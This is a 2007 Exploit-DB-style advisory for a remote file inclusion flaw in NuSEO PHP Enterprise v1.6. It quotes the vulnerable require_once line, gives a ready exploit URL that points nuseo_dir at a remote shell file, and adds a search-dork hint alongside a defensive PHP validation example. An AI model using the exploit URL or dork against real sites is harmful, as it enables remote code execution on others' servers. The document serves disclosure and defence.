Vendor: NuSEO PHP Enterprise
By: BiNgZa
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: NuSEO PHP Enterprise
Affected Version From: NuSEO PHP Enterprise.v1.6
Affected Version To: NuSEO PHP Enterprise.v1.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in NuSEO PHP Enterprise.v1.6

The vulnerability is in the file /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php. The script builds a require_once path from the 'nuseo_dir' variable, so when register_globals is on, an attacker who sets the 'nuseo_dir' parameter in the URL can make the script include a file from a different server, potentially leading to arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before including files. Additionally, it is advised to avoid using remote file inclusion altogether.
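
One way to apply this mitigation, shown as an added example that is not NuSEO's code or the advisory author's: the include path is resolved and checked against a fixed base directory before it is used. `resolve_include()` and the temporary demo directory are hypothetical, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example, not NuSEO code; resolve_include() is a hypothetical helper.
//
// Vulnerable pattern quoted in the advisory (line 268):
//   require_once( $nuseo_dir . '/nuseo' . '_d.php' );
// $nuseo_dir is not set by the script, so with register_globals = On the
// query string supplies it.
//
// php.ini hardening: register_globals = Off (the directive was removed in
// PHP 5.4) and allow_url_include = Off.

/** Return the real path of $file under $dir if it stays inside $base, else null. */
function resolve_include(string $base, string $dir, string $file): ?string
{
    // Reject stream wrappers (http://, ftp://, php://, data:, ...) outright.
    // Two or more scheme characters, so a Windows drive letter is not matched.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $dir)) {
        return null;
    }
    // realpath() resolves ../ and symlinks and returns false for missing files.
    $path = realpath($dir . DIRECTORY_SEPARATOR . $file);
    if ($path === false) {
        return null;
    }
    // The resolved file must sit below the fixed base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary directory stands in for the install root.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'nuseo_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'admin', 0700, true);
file_put_contents($base . DIRECTORY_SEPARATOR . 'nuseo_d.php', "<?php // placeholder\n");
$base = realpath($base);

$candidates = [
    $base,                          // in-tree directory: accepted
    'http://localhost/shell.txt?',  // value shown in the advisory: rejected
    $base . '/admin/../..',         // climbs out of the base: rejected
];
foreach ($candidates as $dir) {
    $path = resolve_include($base, $dir, 'nuseo_d.php');
    echo str_pad($dir, 45), ' => ', $path ?? 'REJECTED', PHP_EOL;
}
// In the application itself: set $nuseo_dir from __DIR__ (a constant), not
// from request data, and require_once only a path resolve_include() returned.
```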

Exploit-DB raw data:

Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-10]